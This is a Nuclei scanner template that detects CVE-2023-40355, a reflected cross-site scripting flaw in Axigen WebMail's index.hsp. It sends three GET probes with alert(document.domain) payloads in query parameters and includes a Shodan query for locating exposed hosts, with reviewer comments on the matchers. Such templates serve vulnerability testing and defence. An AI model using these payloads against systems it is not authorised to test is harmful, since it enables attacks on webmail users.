nuclei-templates/http/cves/2023/CVE-2023-40355.yaml


# Nuclei HTTP template: checks Axigen WebMail's index.hsp for the reflected
# XSS tracked as CVE-2023-40355. It sends up to three unauthenticated GET
# requests and reports a finding when a probe string comes back in an HTML
# response that also mentions "Axigen".
id: CVE-2023-40355

info:
  name: Axigen WebMail - Cross-Site Scripting
  author: amir-h-fallahi
  severity: medium
  # NOTE(review): the text below says "authenticated attackers", while
  # cvss-metrics carries PR:N and the requests in this template send no
  # credentials. Confirm the precondition against the vendor advisory.
  description: |
    Cross Site Scripting (XSS) vulnerability in Axigen versions 10.3.3.0 before 10.3.3.59, 10.4.0 before 10.4.19, and 10.5.0 before 10.5.5, allows authenticated attackers to execute arbitrary code and obtain sensitive information via the logic for switching between the Standard and Ajax versions.
  reference:
    - https://www.axigen.com/knowledgebase/Axigen-WebMail-XSS-Vulnerability-CVE-2023-40355-_396.html
    - https://nvd.nist.gov/vuln/detail/CVE-2023-40355
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2023-40355
    cwe-id: CWE-79
    # EPSS values are a point-in-time snapshot; refresh them before using
    # them for prioritisation.
    epss-score: 0.0006
    epss-percentile: 0.22931
  metadata:
    # One request per entry under http[0].path.
    max-request: 3
    verified: true
    # Favicon-hash filter for inventorying exposed Axigen WebMail hosts.
    shodan-query: http.favicon.hash:-1247684400
  tags: cve,cve2023,xss,axigen,webmail

http:
  - method: GET
    path:
      # Probes 1 and 2: the passwordExpired view with the marker placed in
      # `username` / `domainName`. After YAML unescaping the value sent is
      # \'-alert(document.domain),//
      - "{{BaseURL}}/index.hsp?passwordExpired=yes&username=\\'-alert(document.domain),//"
      - "{{BaseURL}}/index.hsp?passwordExpired=yes&domainName=\\'-alert(document.domain),//"
      # Probe 3: the marker placed in the `m` parameter.
      - "{{BaseURL}}/index.hsp?m=',alert(document.domain),'"

    # Remaining probes are skipped once one of them matches.
    stop-at-first-match: true

    # Both matchers below must hold for a finding.
    matchers-condition: and
    matchers:
      # Reflection check. The first word is the probe with a doubled
      # backslash (\\'), i.e. it differs from what was sent; presumably the
      # server escapes the quote but not the backslash. Verify against a
      # patched and an unpatched build. The second word is probe 3 verbatim.
      - type: word
        part: body
        words:
          - "\\\\'-alert(document.domain),//"
          - "',alert(document.domain),'"
        condition: or

      # Context check: an HTML response with status 200 that contains the
      # product name, which limits hits from unrelated applications that
      # merely echo the query string.
      # NOTE(review): a match shows unencoded reflection, not script
      # execution. Confirm the reflection context and the installed version
      # (fixed in 10.3.3.59, 10.4.19 and 10.5.5 per the description) before
      # closing or escalating a finding.
      - type: dsl
        dsl:
          - 'contains(header, "text/html")'
          - 'contains(response, "Axigen")'
          - 'status_code == 200'
        condition: and
# NOTE(review): the digest below signs the template text as published. It
# will presumably stop verifying once comments or formatting change, so
# re-sign before relying on signature checks.
# digest: 4a0a004730450220183b57c2a71cd7ef299bd414a8937c4136c8b85301e19179a0c81d9e03454d94022100dafbcf2eb06bc385aa209e451c3cde44a73316a406d1ddb139523148c439adbd:922c64590222798bb761d5b6d8e72950